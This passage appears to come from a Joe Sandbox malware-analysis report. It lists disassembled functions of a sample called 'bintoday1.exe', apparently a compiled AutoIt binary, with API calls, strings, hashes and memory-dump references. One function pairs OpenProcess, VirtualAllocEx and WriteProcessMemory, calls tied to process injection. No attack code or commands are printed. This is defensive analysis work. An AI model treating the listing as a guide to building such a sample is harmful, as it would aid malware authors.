Instruction Fuzzy Hash: 93F04936210305EBDB214FA89C8AF6E3BADEF89762F204864FA45C7251CA70DC558A60

Function 00BF1014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00BF102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00BF1036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BF1045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00BF104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BF1062

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 7aa3546fad7d19730f9678e1b0d8110f5ee5350b1ee2f5151ab94c787b629699
Instruction ID: 3b2527065ceb007e2a2af19f2255e73b1f8a72c107e56a030e7bac68fee98b16
Opcode Fuzzy Hash: 7aa3546fad7d19730f9678e1b0d8110f5ee5350b1ee2f5151ab94c787b629699
Instruction Fuzzy Hash: 49F06D35210305FBDB215FA8EC89F6E3BADEF89761F200824FA45C7250CE70D8558A60

Function 00C0030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,00C0017D,?,00C032FC,?,00000001,00BD2592,?), ref: 00C00324
CloseHandle.KERNEL32(?,?,?,?,00C0017D,?,00C032FC,?,00000001,00BD2592,?), ref: 00C00331
CloseHandle.KERNEL32(?,?,?,?,00C0017D,?,00C032FC,?,00000001,00BD2592,?), ref: 00C0033E
CloseHandle.KERNEL32(?,?,?,?,00C0017D,?,00C032FC,?,00000001,00BD2592,?), ref: 00C0034B
CloseHandle.KERNEL32(?,?,?,?,00C0017D,?,00C032FC,?,00000001,00BD2592,?), ref: 00C00358
CloseHandle.KERNEL32(?,?,?,?,00C0017D,?,00C032FC,?,00000001,00BD2592,?), ref: 00C00365

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: c0d34a3f9d583cae495f9ef69f3456a9d980480d76b65005c5aac1fffe6d297f
Instruction ID: f6b2926208a3786c83c35ad716841e6b93e375f482ced2fbec46002d40608313
Opcode Fuzzy Hash: c0d34a3f9d583cae495f9ef69f3456a9d980480d76b65005c5aac1fffe6d297f
Instruction Fuzzy Hash: 6401A272800B159FC7319F66D880516F7F9BF503157268A3FD1A652971C371AA55CF80

Function 00BCD73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00BCD752

Part of subcall function 00BC29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00BCD7D1,00000000,00000000,00000000,00000000,?,00BCD7F8,00000000,00000007,00000000,?,00BCDBF5,00000000), ref: 00BC29DE
Part of subcall function 00BC29C8: GetLastError.KERNEL32(00000000,?,00BCD7D1,00000000,00000000,00000000,00000000,?,00BCD7F8,00000000,00000007,00000000,?,00BCDBF5,00000000,00000000), ref: 00BC29F0

_free.LIBCMT ref: 00BCD764
_free.LIBCMT ref: 00BCD776
_free.LIBCMT ref: 00BCD788
_free.LIBCMT ref: 00BCD79A

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e272b432b900598d1804badc1dd8b3f17d07dbb9e378141bf9d38a7e55284bb0
Instruction ID: faf0da63d48c75649dca752b0c473092de06503e95bdb40c49e6bbaed5ba6ab8
Opcode Fuzzy Hash: e272b432b900598d1804badc1dd8b3f17d07dbb9e378141bf9d38a7e55284bb0
Instruction Fuzzy Hash: 35F0FF76544304ABC621EB64F9C5F1A77DDFB4471179508AEF089E7641CB70FC808664

Function 00BF5C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00BF5C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 00BF5C6F
MessageBeep.USER32(00000000), ref: 00BF5C87
KillTimer.USER32(?,0000040A), ref: 00BF5CA3
EndDialog.USER32(?,00000001), ref: 00BF5CBD

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: eacb1c5a5c044d9e3aa147311e2185aa287efbec3971c2235dc57c0d907aa2a5
Instruction ID: 01b7a3a244b747456c113d63c5a457a482c67e65e94877f919a081e08088cf9d
Opcode Fuzzy Hash: eacb1c5a5c044d9e3aa147311e2185aa287efbec3971c2235dc57c0d907aa2a5
Instruction Fuzzy Hash: ED011730510B04ABEB315B14DD8EFA977F8FF04B05F041599F743A14E1D7F459598A91

Function 00BC22A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00BC22BE

Part of subcall function 00BC29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00BCD7D1,00000000,00000000,00000000,00000000,?,00BCD7F8,00000000,00000007,00000000,?,00BCDBF5,00000000), ref: 00BC29DE
Part of subcall function 00BC29C8: GetLastError.KERNEL32(00000000,?,00BCD7D1,00000000,00000000,00000000,00000000,?,00BCD7F8,00000000,00000007,00000000,?,00BCDBF5,00000000,00000000), ref: 00BC29F0

_free.LIBCMT ref: 00BC22D0
_free.LIBCMT ref: 00BC22E3
_free.LIBCMT ref: 00BC22F4
_free.LIBCMT ref: 00BC2305

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0e8e5d417692e7ed38151338f13d2ba622267b6c7c7cbbcb0fd050b4658a0a30
Instruction ID: 2f0c33d3e611fdfe766d97b8ac4e6ec2da53455dbd59f53759905b2a8715f751
Opcode Fuzzy Hash: 0e8e5d417692e7ed38151338f13d2ba622267b6c7c7cbbcb0fd050b4658a0a30
Instruction Fuzzy Hash: 63F03A748402209F8A22AF95BC41F0D3BA4F718762718059EF850EA3B1CBB00952EFA5

Function 00BA95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00BA95D4
StrokeAndFillPath.GDI32(?,?,00BE71F7,00000000,?,?,?), ref: 00BA95F0
SelectObject.GDI32(?,00000000), ref: 00BA9603
DeleteObject.GDI32 ref: 00BA9616
StrokePath.GDI32(?), ref: 00BA9631

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 22a269555317b2579d9cf17734722ad476392628462742f7e710288ed9281500
Instruction ID: 554e1936601713e87e3750fa31c77541d8ae7e0b56faff142cdbf55cc919bd8c
Opcode Fuzzy Hash: 22a269555317b2579d9cf17734722ad476392628462742f7e710288ed9281500
Instruction Fuzzy Hash: 57F01930409304EBEB365F6AED5976C3BA5EB02322F0C8254F825554F0C7B089A6EFA0

Function 00BC0F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00BC10F9
__freea.LIBCMT ref: 00BC1117

Part of subcall function 00BC1537: _free.LIBCMT ref: 00BC154F

Strings

a/p, xrefs: 00BC11DE
am/pm, xrefs: 00BC117A

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 33868d24066222924e25519347a752427e2094ee856fb23ff3512b60f696ecbe
Instruction ID: fc066244bdd765c76f7807b332b0099261df65f458e53b230c12756cbc5be4eb
Opcode Fuzzy Hash: 33868d24066222924e25519347a752427e2094ee856fb23ff3512b60f696ecbe
Instruction Fuzzy Hash: 34D1F035900246EACB249F6CC895FBAB7F0EF47704F2849DDE901BB642D2359D80CBA5

Function 00C17B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00BB0242: EnterCriticalSection.KERNEL32(00C6070C,00C61884,?,?,00BA198B,00C62518,?,?,?,00B912F9,00000000), ref: 00BB024D
Part of subcall function 00BB0242: LeaveCriticalSection.KERNEL32(00C6070C,?,00BA198B,00C62518,?,?,?,00B912F9,00000000), ref: 00BB028A

Part of subcall function 00B99CB3: _wcslen.LIBCMT ref: 00B99CBD

Part of subcall function 00BB00A3: __onexit.LIBCMT ref: 00BB00A9

__Init_thread_footer.LIBCMT ref: 00C17BFB

Part of subcall function 00BB01F8: EnterCriticalSection.KERNEL32(00C6070C,?,?,00BA8747,00C62514), ref: 00BB0202
Part of subcall function 00BB01F8: LeaveCriticalSection.KERNEL32(00C6070C,?,00BA8747,00C62514), ref: 00BB0235

Strings

Variable must be of type 'Object'., xrefs: 00C17C3A
G, xrefs: 00C17C7F
5, xrefs: 00C17C78

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: 5$G$Variable must be of type 'Object'.
API String ID: 535116098-3733170431
Opcode ID: ac2dada92bb85c487a24f90143c74952385e28278c8e5f5ef38e4eaa90c870a4
Instruction ID: 53246333011845ac8164ee6d5cbf3b4242ccb0f720f824eef0347e84bdbfd44b
Opcode Fuzzy Hash: ac2dada92bb85c487a24f90143c74952385e28278c8e5f5ef38e4eaa90c870a4
Instruction Fuzzy Hash: DF918C74A08209EFCB14EF94D8919FDB7B1FF4A300F108199F8169B291DB71AE85EB51

Function 00BF2716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BFB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00BF21D0,?,?,00000034,00000800,?,00000034), ref: 00BFB42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00BF2760

Part of subcall function 00BFB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00BF21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00BFB3F8

Part of subcall function 00BFB32A: GetWindowThreadProcessId.USER32(?,?), ref: 00BFB355
Part of subcall function 00BFB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00BF2194,00000034,?,?,00001004,00000000,00000000), ref: 00BFB365
Part of subcall function 00BFB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00BF2194,00000034,?,?,00001004,00000000,00000000), ref: 00BFB37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00BF27CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00BF281A

Strings

@, xrefs: 00BF2832

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: da05396c62024831d5ad6475a4cac3c4411ff10f278d8adf8c08bf215622b82b
Instruction ID: b5d5cbab23133a69c64e5a141db838c74124777942da758bbccd30d0149e2a1e
Opcode Fuzzy Hash: da05396c62024831d5ad6475a4cac3c4411ff10f278d8adf8c08bf215622b82b
Instruction Fuzzy Hash: E741F97690021CAEDB10DBA4C986FEEBBB8EF09740F104095FA55B7191DB706E49CBA1

Function 00BC172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\bintoday1.exe,00000104), ref: 00BC1769
_free.LIBCMT ref: 00BC1834
_free.LIBCMT ref: 00BC183E

Strings

C:\Users\user\Desktop\bintoday1.exe, xrefs: 00BC1760, 00BC1767, 00BC1796, 00BC17CE

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\bintoday1.exe
API String ID: 2506810119-2750717164
Opcode ID: 15af6035f7398e35b3c228b08974bf4ea937b83bbb53a4dd42c872499cee7d30
Instruction ID: fd2b06a3b572b43e68df96323075717a8ac8c17f12e7edc4aab8c1c73f927c61
Opcode Fuzzy Hash: 15af6035f7398e35b3c228b08974bf4ea937b83bbb53a4dd42c872499cee7d30
Instruction Fuzzy Hash: 42316475A44218AFDB21DF999C85F9EBBFCEB86310B1445EAF804E7212D6B04E40CB90

Function 00BFC27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00BFC306
DeleteMenu.USER32(?,00000007,00000000), ref: 00BFC34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00C61990,00FB4CC8), ref: 00BFC395

Strings

0, xrefs: 00BFC2DF

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: d9593a2a4b83d064a1f7c53439de02d8da21493f194f23baf6908334ef17cf1c
Instruction ID: f1a5992726955d3b49bac26093a641257da823cbdcfcb8e440e0842a9371373e
Opcode Fuzzy Hash: d9593a2a4b83d064a1f7c53439de02d8da21493f194f23baf6908334ef17cf1c
Instruction Fuzzy Hash: 7E41B1312083099FD720DF25D984B6ABFE4EF85350F1086ADFAA5972D1D730E948CB5A

Function 00C24416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00C2CC08,00000000,?,?,?,?), ref: 00C244AA
GetWindowLongW.USER32 ref: 00C244C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C244D7

Strings

SysTreeView32, xrefs: 00C2447C

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 77dd91d9b158401ec98141677f015e2c0eb65bcbd5eaaf92dcdd9981f626ac3a
Instruction ID: 14941805b68a802aa13ce11439125bc0b6609864c5020088d59e7dc2c772b6d6
Opcode Fuzzy Hash: 77dd91d9b158401ec98141677f015e2c0eb65bcbd5eaaf92dcdd9981f626ac3a
Instruction Fuzzy Hash: 0D319A31210225ABDB249E38EC85BEA7BA9EB09324F204325F975A25E0DB70ED519B50

Function 00C1304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C1335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00C13077,?,?), ref: 00C13378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C1307A
_wcslen.LIBCMT ref: 00C1309B
htons.WSOCK32(00000000,?,?,00000000), ref: 00C13106

Strings

255.255.255.255, xrefs: 00C13095, 00C1309A

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 93b786ee24adc0a7b898923f0fd69621a8b24e6f075bba6338cea1ce8a534d5c
Instruction ID: 365bd91a29c029119b8e6194b8b1f81f6dadfbcc532e1ca26e867840238caadf
Opcode Fuzzy Hash: 93b786ee24adc0a7b898923f0fd69621a8b24e6f075bba6338cea1ce8a534d5c
Instruction Fuzzy Hash: 8331C6356002419FCB10CF69C585EE977E0EF56318F248099E9258B392D771DF85D760

Function 00C23EB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00C23F40
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00C23F54
SendMessageW.USER32(?,00001002,00000000,?), ref: 00C23F78

Strings

SysMonthCal32, xrefs: 00C23F0B

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 399be6b1cca73b722891d1b7474b3c46e1ca071be8c0453fa2a6f588471703e3
Instruction ID: 907a94467361868da983bb4d90d083910464bbe9506b5e87cb83158b800276e3
Opcode Fuzzy Hash: 399be6b1cca73b722891d1b7474b3c46e1ca071be8c0453fa2a6f588471703e3
Instruction Fuzzy Hash: CF21DD32600229BBDF218E90EC82FEE3B75EB48714F110254FE156B1D0C6B5AD55CB90

Function 00C24653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00C24705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00C24713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C2471A

Strings

msctls_updown32, xrefs: 00C24684

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: b9f2c6f9603ab137a2768542ae578135d8851813560c9040ecc3c600a5dde130
Instruction ID: 02d8fd83b51001a05e34602df614844c89475b01b64ddc476ce1c76f1fb59001
Opcode Fuzzy Hash: b9f2c6f9603ab137a2768542ae578135d8851813560c9040ecc3c600a5dde130
Instruction Fuzzy Hash: 83216DB5600218AFDB14DF68ECC1EBB37EDEF5A7A4B040059FA149B691CB70ED51CA60

Function 00BF95AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BF961D

Strings

#notrayicon, xrefs: 00BF95B7
#requireadmin, xrefs: 00BF95D9
#OnAutoItStartRegister, xrefs: 00BF95F3

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 8f06bdf701c28a2d12afb4db246ac2ff4713a5e5053df8272a9969d6189253a2
Instruction ID: 77d9a88962cfde614e1fe1d82324dec3f799a363f930a47df009346b4949eefc
Opcode Fuzzy Hash: 8f06bdf701c28a2d12afb4db246ac2ff4713a5e5053df8272a9969d6189253a2
